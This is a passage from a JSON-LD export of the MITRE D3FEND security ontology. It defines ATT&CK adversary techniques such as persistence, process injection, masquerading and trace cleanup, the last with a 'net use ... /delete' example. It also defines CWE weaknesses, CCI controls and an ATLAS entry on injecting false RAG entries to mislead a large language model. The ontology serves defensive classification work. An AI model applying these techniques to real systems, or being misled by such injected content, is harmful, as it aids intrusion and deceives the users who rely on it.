      "d3f:definition": "In computing, a network printer is a device that can be accessed over a network which makes a persistent representation of graphics or text, usually on paper. While most output is human-readable, bar code printers are an example of an expanded use for printers. The different types of printers include 3D printer, inkjet printer, laser printer, thermal printer, etc.  Note that not all printers are networked and the digital information to be printed must be passed either by removable media or as directly connecting the printer to a computer (e.g., by USB.)",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Printer_(computing)"
      },
      "rdfs:label": "Network Printer",
      "rdfs:subClassOf": {
        "@id": "d3f:SharedComputer"
      }
    },
    {
      "@id": "d3f:T1546.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.001",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Change Default File Association",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N426fe97aa77a4d63bd542190deb0ad34"
        }
      ]
    },
    {
      "@id": "_:N426fe97aa77a4d63bd542190deb0ad34",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CCI-000029_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined limitations on the embedding of data types within other data types.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000029"
    },
    {
      "@id": "d3f:Q-Learning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-QL",
      "d3f:definition": "Q-learning is a model-free reinforcement learning algorithm to learn the value of an action in a particular state. It does not require a model of the environment (hence \"model-free\"), and it can handle problems with stochastic transitions and rewards without requiring adaptations.",
      "d3f:kb-article": "## References\nQ-learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Q-learning).",
      "rdfs:label": "Q-Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-freeReinforcementLearning"
      }
    },
    {
      "@id": "d3f:ApplicationLayerLink",
      "@type": "owl:Class",
      "d3f:definition": "An Application Layer Link is a type of logical link that exists at the application layer of a network or system architecture.",
      "rdfs:label": "Application Layer Link",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "d3f:CWE-1247",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1247",
      "d3f:definition": "The device does not contain or contains incorrectly implemented circuitry or sensors to detect and mitigate voltage and clock glitches and protect sensitive information or software contained on the device.",
      "rdfs:label": "Improper Protection Against Voltage and Clock Glitches",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1384"
      }
    },
    {
      "@id": "d3f:T1616",
      "@type": "owl:Class",
      "d3f:attack-id": "T1616",
      "d3f:definition": "Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.",
      "rdfs:label": "Call Control - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Call Control"
    },
    {
      "@id": "d3f:provider",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x provider y: A provider y is an entity that supplies a service, system, or data resources to a dependent entity x.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/05901034-n"
      },
      "rdfs:label": "provider",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/10696710-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:SMBFileCreateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is created if it does not already exist, failing if the file is already present. This operation strictly enforces new file creation.",
      "rdfs:label": "SMB File Create Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SMBEvent"
      }
    },
    {
      "@id": "d3f:HTTPConnectEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP CONNECT method is used to establish a tunnel to the server identified by the target resource.",
      "rdfs:label": "HTTP CONNECT Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:OTEmbeddedComputer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A ruggedized computational device, embedded in industrial control systems, designed to handle real-time tasks and environmental stressors common in OT.",
      "rdfs:label": "OT Embedded Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:EmbeddedComputer"
      }
    },
    {
      "@id": "d3f:REC-0008.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008.03",
      "d3f:definition": "Adversaries correlate discovered component and software versions with public and private vulnerability sources to assemble a ready exploit catalog. Inputs include CPE/CVE mappings, vendor advisories, CWE-class weaknesses common to selected RTOS/middleware, FPGA IP core errata, cryptographic library issues, and hardware stepping errata that interact with thermal/power regimes. They mine leaked documents, demo code, bug trackers, and community forums; pivot from ground assets to flight by following shared libraries and tooling; and watch for lag between disclosure and patch deployment. Even when a vulnerability seems “ground-only,” it may expose build systems or update paths that ultimately control flight artifacts.",
      "rdfs:label": "Known Vulnerabilities - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0008"
      },
      "skos:prefLabel": "Known Vulnerabilities"
    },
    {
      "@id": "d3f:T1130",
      "@type": "owl:Class",
      "d3f:attack-id": "T1130",
      "d3f:definition": "Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1553.004",
      "rdfs:label": "Install Root Certificate",
      "rdfs:seeAlso": {
        "@id": "d3f:T1553.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1596.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.005",
      "d3f:definition": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)",
      "rdfs:label": "Scan Databases",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:AML.T0002.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0002.000",
      "d3f:definition": "Adversaries may collect public datasets to use in their operations.\nDatasets used by the victim organization or datasets that are representative of the data used by the victim organization may be valuable to adversaries.\nDatasets can be stored in cloud storage, or on victim-owned websites.\nSome datasets require the adversary to [Establish Accounts](/techniques/AML.T0021) for access.\n\nAcquired datasets help the adversary advance their operations, stage attacks,  and tailor attacks to the victim organization.",
      "rdfs:label": "Datasets - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0002.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0002"
      },
      "skos:prefLabel": "Datasets"
    },
    {
      "@id": "d3f:process-parent",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x process-parent y: The process y created the process x (directly) with a create process event.",
      "rdfs:label": "process-parent",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-ancestor"
      },
      "skos:altLabel": "processParent"
    },
    {
      "@id": "d3f:CWE-235",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-235",
      "d3f:definition": "The product does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount.",
      "rdfs:label": "Improper Handling of Extra Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-233"
      }
    },
    {
      "@id": "d3f:PrivilegeEscalationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to gain higher-level permissions.",
      "d3f:enables": {
        "@id": "d3f:TA0004"
      },
      "rdfs:label": "Privilege Escalation Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N2025a8c60dc04635b28cd1f57a0c5338"
        }
      ]
    },
    {
      "@id": "_:N2025a8c60dc04635b28cd1f57a0c5338",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0004"
      }
    },
    {
      "@id": "d3f:CCI-001424_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system dynamically associates security attributes with organization-defined subjects in accordance with organization-defined security policies as information is created and combined.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001424"
    },
    {
      "@id": "d3f:CWE-6",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-6",
      "d3f:definition": "The J2EE application is configured to use an insufficient session ID length.",
      "rdfs:label": "J2EE Misconfiguration: Insufficient Session-ID Length",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-334"
      }
    },
    {
      "@id": "d3f:TA0003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.",
      "d3f:display-order": 3,
      "rdfs:label": "Persistence",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1093",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1093",
      "d3f:definition": "The product uses an unnecessarily complex internal representation for its data structures or interrelationships between those structures.",
      "rdfs:label": "Excessively Complex Data Representation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CCI-000218_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, identifies information flows by data type specification and usage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000218"
    },
    {
      "@id": "d3f:AdaptiveResonanceTheoryClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ARTC",
      "d3f:definition": "Adaptive Resonance Theory (ART) Clustering is a  neural network algorithm used for clustering data and is open to new learning(i.e. adaptive) without discarding the previous or the old information(i.e. resonance).",
      "d3f:kb-article": "## References\nGeeksforGeeks. (n.d.). Adaptive Resonance Theory (ART). [Link](https://www.geeksforgeeks.org/adaptive-resonance-theory-art/)",
      "rdfs:label": "Adaptive Resonance Theory Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ANN-basedClustering"
      }
    },
    {
      "@id": "d3f:AML.T0071",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0071",
      "d3f:definition": "Adversaries may introduce false entries into a victim's retrieval augmented generation (RAG) database. Content designed to be interpreted as a document by the large language model (LLM) used in the RAG system is included in a data source being ingested into the RAG database. When RAG entry including the false document is retrieved, the LLM is tricked into treating part of the retrieved content as a false RAG result.\n\nBy including a false RAG document inside of a regular RAG entry, it bypasses data monitoring tools. It also prevents the document from being deleted directly.\n\nThe adversary may use discovered system keywords to learn how to instruct a particular LLM to treat content as a RAG entry. They may be able to manipulate the injected entry's metadata including document title, author, and creation date.",
      "rdfs:label": "False RAG Entry Injection - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0071"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "False RAG Entry Injection"
    },
    {
      "@id": "d3f:GeometricMean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GM",
      "d3f:definition": "The nth root of the product of the data values, where there are n of these. This measure is valid only for data that are measured absolutely on a strictly positive scale.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Geometric Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:T1588.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.003",
      "d3f:definition": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.",
      "rdfs:label": "Code Signing Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:MultivariateAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MA",
      "d3f:definition": "Multivariate statistics encompassed the simultaneous observation and analysis of more than one outcome variable, i.e., multivariate random variables.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Multivariate statistics. [Link](https://en.wikipedia.org/wiki/Multivariate_statistics)",
      "rdfs:label": "Multivariate Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:Centroid-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CBC",
      "d3f:definition": "Centroid-based clustering organizes the data into non-hierarchical clusters, in contrast to hierarchical clustering defined below. K-means is the most widely-used centroid-based clustering algorithm. Centroid-based algorithms are efficient but sensitive to initial conditions and outliers.",
      "d3f:kb-article": "## References\nGoogle Developers. (n.d.). Clustering Algorithms. [Link](https://developers.google.com/machine-learning/clustering/clustering-algorithms)",
      "rdfs:label": "Centroid-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:WindowsCreateRemoteThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a thread that runs in the virtual address space of another process.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtCreateThreadEx"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread"
      },
      "rdfs:label": "Windows CreateRemoteThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateThread"
        },
        {
          "@id": "_:Nc1df7925c6b940e18f407a1b930eacfd"
        }
      ]
    },
    {
      "@id": "_:Nc1df7925c6b940e18f407a1b930eacfd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateThreadEx"
      }
    },
    {
      "@id": "d3f:Reference-FirmwareVerificationEclypsium",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20200074086A1/en"
      },
      "d3f:kb-abstract": "Systems and methods are provided herein for monitoring and identifying potential security vulnerabilities in hardware and / or firmware of host devices .",
      "d3f:kb-author": "Yuriy Bulygin, Oleksandr Bazhaniuk",
      "d3f:kb-organization": "ECLYPSIUM , Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareVerification"
      },
      "d3f:kb-reference-title": "Methods and systems for hardware and firmware security monitoring",
      "rdfs:label": "Reference - Firmware Verification Eclypsium"
    },
    {
      "@id": "d3f:AnalyticalPurpose",
      "@type": "owl:Class",
      "rdfs:label": "Analytical Purpose",
      "rdfs:subClassOf": {
        "@id": "d3f:Goal"
      }
    },
    {
      "@id": "d3f:T1055.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1055.011",
      "d3f:definition": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.",
      "rdfs:label": "Extra Window Memory Injection",
      "rdfs:subClassOf": {
        "@id": "d3f:T1055"
      }
    },
    {
      "@id": "d3f:FTPListEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the contents of a directory on an FTP server are listed, providing metadata such as file names, sizes, and timestamps.",
      "rdfs:label": "FTP List Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FTPEvent"
      }
    },
    {
      "@id": "d3f:M1022",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:LocalFilePermissions"
      },
      "rdfs:label": "Restrict File and Directory Permissions"
    },
    {
      "@id": "d3f:RemoteTerminalSession",
      "@type": "owl:Class",
      "d3f:definition": "A remote terminal session is a session that provides a user access from one host to another host via a terminal.",
      "rdfs:label": "Remote Terminal Session",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:Kurtosis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KUR",
      "d3f:definition": "The measure of the \"fatness\" of the tails of a pmf or pdf. The fourth standardized moment of the distribution.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Probability distribution. [Link](https://en.wikipedia.org/wiki/Probability_distribution)",
      "rdfs:label": "Kurtosis",
      "rdfs:subClassOf": {
        "@id": "d3f:DistributionProperties"
      }
    },
    {
      "@id": "d3f:CWE-258",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-258",
      "d3f:definition": "Using an empty string as a password is insecure.",
      "rdfs:label": "Empty Password in Configuration File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-260"
        },
        {
          "@id": "d3f:CWE-521"
        }
      ]
    },
    {
      "@id": "d3f:Density-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DBC",
      "d3f:definition": "Density-based clustering connects areas of high example density into clusters. This allows for arbitrary-shaped distributions as long as dense areas can be connected.",
      "d3f:kb-article": "## References\nGoogle Developers. (n.d.). Clustering algorithms. [Link](https://developers.google.com/machine-learning/clustering/clustering-algorithms)",
      "rdfs:label": "Density-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTSP800-53ControlCatalog"
      ],
      "d3f:archived-at": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2013-04-30"
      },
      "d3f:version": 3,
      "rdfs:label": "NIST SP 800-53 R3",
      "rdfs:seeAlso": {
        "@id": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2013-04-30"
      }
    },
    {
      "@id": "d3f:SerializationFunction",
      "@type": "owl:Class",
      "d3f:definition": "A function which has an operation that serializes data.",
      "rdfs:label": "Serialization Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-007%3ANetworkShareConnectionRemoval_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-007/"
      },
      "d3f:kb-abstract": "Adversaries may use network shares to exfliltrate date; they will then remove the shares to cover their tracks. This analytic looks for the removal of network shares via commandline, which is otherwise a rare event.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-007: Network Share Connection Removal",
      "rdfs:label": "Reference - CAR-2020-11-007: Network Share Connection Removal - MITRE"
    },
    {
      "@id": "d3f:T1070.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.005",
      "d3f:definition": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\\\system\\share /delete</code> command. (Citation: Technet Net Use)",
      "d3f:unmounts": {
        "@id": "d3f:NetworkFileShareResource"
      },
      "rdfs:label": "Network Share Connection Removal",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:N3d0261f7a1e145f88e8f3665ac9a8804"
        }
      ]
    },
    {
      "@id": "_:N3d0261f7a1e145f88e8f3665ac9a8804",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:unmounts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkFileShareResource"
      }
    },
    {
      "@id": "d3f:access-mediated-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x access-mediated-by y: The entity or resource x has its access regulated, controlled, or facilitated by entity y, which acts as an intermediary or gatekeeper to enforce access control policies.",
      "owl:inverseOf": {
        "@id": "d3f:mediates-access-to"
      },
      "rdfs:label": "access-mediated-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-ProcessesSpawningCmd.exe_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-02-003/"
      },
      "d3f:kb-abstract": "The Windows Command Prompt (cmd.exe) is a utility that provides a command line interface to Windows operating systems. It provides the ability to run additional programs and also has several built-in commands such as dir, copy, mkdir, and type, as well as batch scripts (.bat). Typically, when a user runs a command prompt, the parent process is explorer.exe or another instance of the prompt. There may be automated programs, logon scripts, or administrative tools that launch instances of the command prompt in order to run scripts or other built-in commands. Spawning the process cmd.exe from certain parents may be more indicative of malice. For example, if Adobe Reader or Outlook launches a command shell, this may suggest that a malicious document has been loaded and should be investigated. Thus, by looking for abnormal parent processes of cmd.exe, it may be possible to detect adversaries.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-02-003: Processes Spawning cmd.exe",
      "rdfs:label": "Reference - CAR-2013-02-003: Processes Spawning cmd.exe - MITRE"
    },
    {
      "@id": "d3f:Reference-End-to-endCertificatePinning",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9847992B2/en?q=certificate+pinning&oq=certificate+pinning"
      },
      "d3f:kb-abstract": "Some embodiments implement end-to-end certificate pinning for content intake from various content providers and for content distribution to various end users. To ensure secure retrieval of content provider content, the content distributor pins the content provider to one or more certificate authorities.",
      "d3f:kb-author": "Tin Zaw, Reed Morrison, Robert J. Peters",
      "d3f:kb-organization": "Verizon Digital Media Services Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:CertificatePinning"
      },
      "d3f:kb-reference-title": "End-to-end Certificate Pinning",
      "rdfs:label": "Reference - End-to-end certificate pinning"
    },
    {
      "@id": "d3f:TransducerSensor",
      "@type": "owl:Class",
      "d3f:definition": "A Transducer Sensor converts physical signals into digital data for monitoring purposes.",
      "rdfs:label": "Transducer Sensor",
      "rdfs:subClassOf": {
        "@id": "d3f:Sensor"
      }
    },
    {
      "@id": "d3f:ImageDataSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An image data segment (often denoted .data) is a portion of an object file that contains initialized static variables, that is, global variables and static local variables. The size of this segment is determined by the size of the values in the program's source code, and does not change at run time. This segmenting of the memory space into discrete blocks with specific tasks carried over into the programming languages of the day and the concept is still widely in use within modern programming languages.",
      "rdfs:label": "Image Data Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ProcessDataSegment"
        },
        {
          "@id": "dbr:Data_segment"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ImageSegment"
      }
    },
    {
      "@id": "d3f:T1213.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:WebFileResource"
      },
      "d3f:attack-id": "T1213.002",
      "d3f:definition": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:",
      "rdfs:label": "Sharepoint",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1213"
        },
        {
          "@id": "_:Nb188466300ed417db33f1aa076ab16ce"
        }
      ]
    },
    {
      "@id": "_:Nb188466300ed417db33f1aa076ab16ce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebFileResource"
      }
    },
    {
      "@id": "d3f:CCI-000381_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization configures the information system to provide only essential capabilities.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000381"
    },
    {
      "@id": "d3f:DS0032",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another",
      "rdfs:comment": "This data source captures events relating to containers and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Container (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-641",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-641",
      "d3f:definition": "The product constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name.",
      "rdfs:label": "Improper Restriction of Names for Files and Other Resources",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-99"
      }
    },
    {
      "@id": "d3f:IntranetNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet network traffic is network traffic traversing that does not traverse a given network's boundaries.",
      "rdfs:label": "Intranet Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1036",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036",
      "d3f:definition": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.",
      "rdfs:label": "Masquerading",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Revocation of Access Authorizations",
      "d3f:member-of": {
